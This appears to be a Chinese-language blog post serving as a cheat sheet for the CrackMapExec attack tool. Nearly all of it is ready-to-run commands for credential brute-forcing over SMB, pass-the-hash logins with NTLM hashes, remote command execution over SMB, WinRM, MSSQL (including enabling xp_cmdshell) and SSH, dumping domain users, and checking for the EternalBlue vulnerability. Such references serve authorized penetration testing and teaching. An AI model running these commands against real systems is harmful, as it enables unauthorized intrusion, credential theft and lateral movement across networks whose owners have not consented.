CrackMapExec服务密码爆破工具使用

基本语法

crackmapexec <协议> <目标IP或范围> [选项]

示例:

crackmapexec smb 192.168.1.0/24 -u admin -p 'P@ssw0rd!'

常用协议与模块

1. SMB 协议

基础命令

# 枚举共享
crackmapexec smb 192.168.1.100 --shares -u guest -p ''

# 传递哈希(NTLM)
crackmapexec smb 192.168.1.100 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

# 执行命令(通过 -x)
crackmapexec smb 192.168.1.100 -u user -p pass -x 'whoami'

# 暴力破解
crackmapexec smb 192.168.1.100 -u users.txt -p passwords.txt

高级功能

# 导出所有域用户
crackmapexec smb 192.168.1.100 -u user -p pass --users

# 检测永恒之蓝漏洞
crackmapexec smb 192.168.1.100 -u guest -p '' -M ms17-010

2. WinRM 协议

# 执行命令
crackmapexec winrm 192.168.1.100 -u admin -p 'Password123!' -x 'ipconfig'

# 使用哈希登录
crackmapexec winrm 192.168.1.100 -u administrator -H <NTLM哈希>

3. MSSQL 协议

# 执行SQL查询
crackmapexec mssql 192.168.1.100 -u sa -p 'sqlpass' -q 'SELECT name FROM master..sysdatabases'

# 启用xp_cmdshell并执行系统命令
crackmapexec mssql 192.168.1.100 -u sa -p 'sqlpass' -X enable_xp_cmdshell -x 'whoami'

4. SSH 协议

# 登录并执行命令
crackmapexec ssh 192.168.1.100 -u root -p 'toor' -x 'id'

常用选项

参数 说明
-u 指定用户名或用户字典文件
-p 指定密码或密码字典文件
-H 使用NTLM哈希(格式:LMHASH:NTHASH)
-d 指定域名
--local-auth 使用本地身份验证(非域账户)
-M 调用内置模块(如漏洞检测)
-o 输出结果到文件
--continue-on-success 成功后继续尝试其他凭据
posted @ 2025-12-04 16:29  shinianyunyan  阅读(1)  评论(0)    收藏  举报